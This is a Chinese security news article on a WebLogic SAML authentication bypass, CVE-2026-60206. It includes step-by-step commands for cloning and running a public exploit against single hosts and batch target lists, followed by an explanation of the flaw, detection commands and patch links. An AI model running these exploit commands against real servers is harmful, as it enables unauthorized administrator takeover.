导语:Oracle(甲骨文)于2026年7月补丁日披露了WebLogic Server Core组件中的一枚SAML认证绕过漏洞,CVSS评分高达9.9,低权限攻击者可直接通过SAML接口夺取服务器控制权。目前GitHub已有公开POC,支持XSW(XML签名封装)、NameID注入、无符号断言伪造等多种攻击手法。
一、漏洞概况
CVE-2026-60206属于SAML(安全断言标记语言)认证绕过的典型案例,攻击者利用该漏洞可在无需有效凭证的情况下以管理员身份登录WebLogic管理后台。
漏洞基本信息:
| 项目 | 详情 |
|---|---|
| CVE编号 | CVE-2026-60206 |
| 类型 | SAML认证绕过 |
| CVSS 3.1评分 | 9.9(极度危险) |
| CVSS向量 | AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
| CWE | CWE-306(关键功能缺失认证) |
| 影响组件 | Oracle WebLogic Server Core |
受影响的WebLogic Server版本:
- 12.2.1.4.0
- 14.1.1.0.0
- 14.1.2.0.0
- 15.1.1.0.0
二、POC获取与使用
2.1 获取POC
POC项目地址:https://github.com/imbas007/CVE-2026-60206
git clone https://github.com/imbas007/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt
2.2 依赖说明
POC基于Python 3编写,主要依赖以下模块:
requests— HTTP通信xml— SAML XML构造与篡改lxml— XML高级处理
2.3 使用方法
单目标检测(识别版本+SAML端点):
python3 CVE-2026-60206-exploit.py -t https://target:7002 --detect
批量目标检测:
python3 CVE-2026-60206-exploit.py -l targets.txt -o results.json
检测+利用(推荐,速度更快):
python3 CVE-2026-60206-exploit.py -l targets.txt --exploit --no-verify -T 30 -o results.json
指定攻击模式:
# combo模式:XSW + 无符号 + NameID组合攻击(推荐)
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode combo -u admin -v
# 仅XSW签名封装攻击
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode xsw -u weblogic
# 无符号SAML断言注入
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode unsigned -u admin
# 带代理测试
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode all --proxy http://127.0.0.1:8080 --no-verify
2.4 支持的攻击模式
| 模式 | 说明 |
|---|---|
unsigned | 无符号SAML断言注入 |
xsw | XML签名封装(4种变体) |
nameid | NameID操纵/注释注入 |
combo | XSW + Unsigned + NameID组合攻击 ⭐ |
audience | AudienceRestriction绕过 |
conditions | 时间/有效期限制绕过 |
replay | SAML响应重放 |
all | 全量攻击模式 |
三、漏洞原理简析
CVE-2026-60206本质上属于SAML认证流程的签名验证缺陷。WebLogic的SAML SP(服务提供商)组件在处理SAML响应时,未能正确校验XML签名的完整性或引用的正确性,导致攻击者可以通过以下方式构造恶意SAML断言:
XML签名封装(XSW):在保持签名有效的同时,通过在XML结构中插入伪造元素,使验证方错误地信任攻击者构造的断言内容。
无符号断言注入:部分SAML配置允许不签名 Assertion 直接传输,攻击者直接伪造用户身份。
NameID注入:通过在NameID字段中注入特殊字符或XML注释,干扰解析逻辑以绕过格式校验。
四、检测与修复建议
检测
通过以下方式判断目标是否受影响:
# 确认WebLogic版本
curl -k https://target:7002/console/login/LoginForm.jsp | grep -i weblogic
# 确认SAML端点存在(通常在/saml2/路径下)
curl -k https://target:7002/saml2/ -I
修复
Oracle官方已发布2026年7月关键补丁更新(CPU),受影响用户应立即升级至以下补丁版本或更高版本:
- Oracle官方公告:https://www.oracle.com/security-alerts/cpujul2026.html
- NVD详情:https://nvd.nist.gov/vuln/detail/CVE-2026-60206
版权声明:本文由华盟网原创发布,保留所有权利。配图由华盟网授权使用。














暂无评论内容